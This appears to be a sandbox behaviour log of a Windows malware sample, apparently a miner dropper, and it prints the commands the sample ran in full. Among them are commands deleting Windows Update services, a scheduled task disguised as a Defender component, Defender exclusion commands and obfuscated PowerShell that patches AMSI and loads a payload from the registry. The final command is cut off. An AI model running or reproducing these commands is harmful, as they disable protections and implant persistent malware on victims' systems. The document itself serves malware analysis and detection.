C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:2396

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:1236

C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name, VideoProcessor
4⤵
PID:2788

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:2900

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:3712

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:1936

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:4168

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:4004

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:3344

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
- Modifies security service
PID:5092

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:4536

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:3772

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nefucvtr#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2236

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
2⤵
PID:392

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#waqsnj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "WindowsDefenderSmartScreenQC" } Else { "C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe" }
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5052

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn WindowsDefenderSmartScreenQC
3⤵
PID:1908

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4384

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
PID:4380

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:2448

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:1676

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:3320

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:4036

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:5068

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:4972

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:1388

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
PID:2212

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:2424

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:4584

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe ovyftblehadxh
2⤵
PID:3664

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
2⤵
PID:5036

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
2⤵
PID:1236

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe dazvaqbeggbsgujt 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
2⤵
PID:4004

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 2044 -ip 2044
1⤵
PID:4872

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:psJNWpAQrYlv{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$QfVsiENQRBSjzA,[Parameter(Position=1)][Type]$RiCnzyrqQh)$MIoyNGutNKc=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+''+'l'+'e'+[Char](99)+''+'t'+'e'+'d'+''+[Char](68)+''+[Char](101)+'l'+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+'M'+''+[Char](101)+''+'m'+''+[Char](111)+'r'+[Char](121)+''+'M'+''+[Char](111)+''+[Char](100)+''+'u'+''+[Char](108)+''+[Char](101)+'',$False).DefineType('M'+[Char](121)+''+'D'+''+'e'+''+'l'+'e'+[Char](103)+'a'+[Char](116)+''+[Char](101)+''+'T'+''+[Char](121)+'p'+[Char](101)+'',''+'C'+''+'l'+'a'+[Char](115)+'s'+[Char](44)+''+[Char](80)+''+[Char](117)+'b'+'l'+''+[Char](105)+''+'c'+',S'+'e'+''+'a'+''+[Char](108)+'ed'+','+''+'A'+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+'s'+[Char](44)+'A'+'u'+''+[Char](116)+''+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$MIoyNGutNKc.DefineConstructor(''+[Char](82)+'T'+[Char](83)+'p'+'e'+'c'+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+'a'+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+'e'+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$QfVsiENQRBSjzA).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+'e'+''+[Char](100)+'');$MIoyNGutNKc.DefineMethod(''+[Char](73)+'n'+'v'+''+[Char](111)+''+[Char](107)+'e',''+[Char](80)+'u'+'b'+''+'l'+''+[Char](105)+'c,Hi'+[Char](100)+''+[Char](101)+''+'B'+'y'+[Char](83)+''+[Char](105)+'g,'+'N'+'e'+'w'+''+'S'+''+[Char](108)+''+'o'+''+[Char](116)+''+[Char](44)+'V'+[Char](105)+''+'r'+''+[Char](116)+'u'+[Char](97)+''+[Char](108)+'',$RiCnzyrqQh,$QfVsiENQRBSjzA).SetImplementationFlags('Run'+[Char](116)+''+'i'+''+[Char](109)+''+'e'+''+[Char](44)+'M'+[Char](97)+''+'n'+'a'+'g'+'ed');Write-Output $MIoyNGutNKc.CreateType();}$ookXaxfJsRRLd=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+[Char](116)+''+'e'+''+[Char](109)+''+'.'+''+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+'i'+''+[Char](99)+''+[Char](114)+''+[Char](111)+'s'+[Char](111)+''+'f'+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+'2.'+[Char](85)+''+[Char](110)+''+[Char](115)+''+[Char](97)+'f'+'e'+''+[Char](111)+''+[Char](111)+'k'+[Char](88)+''+[Char](97)+''+[Char](120)+''+[Char](102)+''+[Char](74)+''+[Char](115)+''+'R'+''+[Char](82)+''+[Char](76)+''+[Char](100)+'');$MLFGApAUrAlmnm=$ookXaxfJsRRLd.GetMethod(''+[Char](77)+''+'L'+''+'F'+''+[Char](71)+'A'+[Char](112)+''+'A'+'U'+[Char](114)+''+[Char](65)+''+'l'+''+'m'+''+'n'+'m',[Reflection.BindingFlags]''+[Char](80)+'u'+[Char](98)+'li'+[Char](99)+''+','+''+'S'+''+[Char](116)+''+[Char](97)+''+'t'+''+[Char](105)+'c',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$WvJQGbIWVfltBIMiMFk=psJNWpAQrYlv @([String])([IntPtr]);$qvHWQcUHfwqnrvNbGoOagg=psJNWpAQrYlv @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$NGJlwVHVpPA=$ookXaxfJsRRLd.GetMethod(''+'G'+''+[Char](101)+''+'t'+'M'+'o'+''+[Char](100)+'ul'+'e'+''+[Char](72)+'a'+'n'+''+[Char](100)+'l'+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+''+[Char](114)+''+[Char](110)+'e'+[Char](108)+''+[Char](51)+''+'2'+''+[Char](46)+''+[Char](100)+''+'l'+'l')));$breQmhQCwGuBys=$MLFGApAUrAlmnm.Invoke($Null,@([Object]$NGJlwVHVpPA,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+'Li'+'b'+''+[Char](114)+'a'+'r'+''+'y'+''+[Char](65)+'')));$FHlIxdUaaDkqHqBcm=$MLFGApAUrAlmnm.Invoke($Null,@([Object]$NGJlwVHVpPA,[Object](''+[Char](86)+'i'+'r'+''+'t'+''+'u'+'a'+'l'+''+'P'+'r'+'o'+''+[Char](116)+''+[Char](101)+''+[Char](99)+''+'t'+'')));$dwImXxs=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($breQmhQCwGuBys,$WvJQGbIWVfltBIMiMFk).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+'i.'+[Char](100)+''+[Char](108)+''+[Char](108)+'');$EMyWzisSesRlfPpOE=$MLFGApAUrAlmnm.Invoke($Null,@([Object]$dwImXxs,[Object](''+[Char](65)+'m'+[Char](115)+''+'i'+''+[Char](83)+'c'+[Char](97)+''+[Char](110)+''+'B'+'u'+[Char](102)+''+'f'+'e'+[Char](114)+'')));$lJYLGRAkoa=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FHlIxdUaaDkqHqBcm,$qvHWQcUHfwqnrvNbGoOagg).Invoke($EMyWzisSesRlfPpOE,[uint32]8,4,[ref]$lJYLGRAkoa);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$EMyWzisSesRlfPpOE,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FHlIxdUaaDkqHqBcm,$qvHWQcUHfwqnrvNbGoOagg).Invoke($EMyWzisSesRlfPpOE,[uint32]8,0x20,[ref]$lJYLGRAkoa);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+'F'+''+[Char](84)+''+[Char](87)+'A'+[Char](82)+''+'E'+'').GetValue(''+[Char](100)+''+'i'+'al'+[Char](101)+'r'+[Char](115)+'t'+[Char](97)+''+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)
1⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:64

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:ulqMZEKFdjNH{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$SjfnAHehruZdmw,[Parameter(Position=1)][Type]$qaYPLiwuHX)$BUPUSmEjvxg=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+''+'d'+''+[Char](68)+''+'e'+''+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InM'+[Char](101)+''+[Char](109)+''+[Char](111)+'r'+[Char](121)+''+[Char](77)+'od'+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+''+'D'+''+'e'+''+'l'+''+'e'+'ga'+[Char](116)+''+'e'+''+'T'+''+[Char](121)+'p'+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+','+''+[Char](80)+'u'+'b'+''+[Char](108)+'i'+'c'+''+','+'Se'+[Char](97)+''+[Char](108)+''+'e'+''+'d'+','+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+'C'+[Char](108)+'a'+'s'+''+[Char](115)+''+[Char](44)+'A'+'u'+''+[Char](116)+''+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$BUPUSmEjvxg.DefineConstructor('R'+'T'+''+'S'+''+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+''+'a'+''+'l'+''+'N'+'a'+[Char](109)+''+'e'+''+[Char](44)+'H'+[Char](105)+'d'+[Char](101)+'B'+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+',Pu'+'b'+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$SjfnAHehruZdmw).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+'M'+'a'+''+'n'+''+[Char](97)+''+[Char](103)+'e'+'d'+'');$BUPUSmEjvxg.DefineMethod(''+[Char](73)+'n'+'v'+''+'o'+''+[Char](107)+'e',''+[Char](80)+''+[Char](117)+''+'b'+'li'+'c'+''+[Char](44)+''+[Char](72)+'id'+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+','+[Char](78)+''+'e'+''+[Char](119)+''+'S'+''+[Char](108)+''+[Char](111)+'t,'+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$qaYPLiwuHX,$SjfnAHehruZdmw).SetImplementationFlags('Ru'+'n'+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+'na'+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $BUPUSmEjvxg.CreateType();}$AEByjpqxOMznF=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+'s'+[Char](116)+'e'+'m'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+'c'+[Char](114)+''+[Char](111)+''+'s'+''+[Char](111)+''+'f'+''+'t'+''+'.'+'Wi'+[Char](110)+'3'+[Char](50)+''+[Char](46)+'U'+'n'+'s'+[Char](97)+''+'f'+''+'e'+''+[Char](65)+'EB'+[Char](121)+''+[Char](106)+''+[Char](112)+''+[Char](113)+'x'+[Char](79)+'M'+'z'+''+[Char](110)+'F');$yMGtqSvVduSiCg=$AEByjpqxOMznF.GetMethod(''+'y'+''+[Char](77)+'Gtq'+[Char](83)+''+[Char](118)+'V'+[Char](100)+'uSiCg',[Reflection.BindingFlags]''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+','+''+[Char](83)+''+'t'+''+[Char](97)+''+'t'+''+[Char](105)+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$HQwmtereYbGXZrpZxyf=ulqMZEKFdjNH @([String])([IntPtr]);$MchzwrzYYfQYWLzkLfoGEY=ulqMZEKFdjNH @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$kaeQjRzhrBA=$AEByjpqxOMznF.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+'Mo'+[Char](100)+'u'+[Char](108)+''+[Char](101)+''+'H'+''+'a'+'nd'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+'n'+'el'+[Char](51)+''+[Char](50)+''+[Char](46)+''+'d'+''+[Char](108)+'l')));$FouLSyvEIYRxpA=$yMGtqSvVduSiCg.Invoke($Null,@([Object]$kaeQjRzhrBA,[Object](''+[Char](76)+''+'o'+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+'r'+[Char](97)+''+[Char](114)+''+[Char](121)+'A')));$xlKftmpEfPHQzbKPQ=$yMGtqSvVduSiCg.Invoke($Null,@([Object]$kaeQjRzhrBA,[Object](''+'V'+''+[Char](105)+''+'r'+''+[Char](116)+''+'u'+'alP'+[Char](114)+''+[Char](111)+''+[Char](116)+''+'e'+''+'c'+''+'t'+'')));$AbsXCgR=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FouLSyvEIYRxpA,$HQwmtereYbGXZrpZxyf).Invoke(''+'a'+''+'m'+''+[Char](115)+''+'i'+''+'.'+''+'d'+''+[Char](108)+'l');$NhXRftmawLxNQemBa=$yMGtqSvVduSiCg.Invoke($Null,@([Object]$AbsXCgR,[Object](''+[Char](65)+'m'+'s'+'i'+[Char](83)+'ca'+[Char](110)+''+[Char](66)+''+[Char](117)+''+'f'+''+'f'+'e'+[Char](114)+'')));$PIykjhaOpH=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPo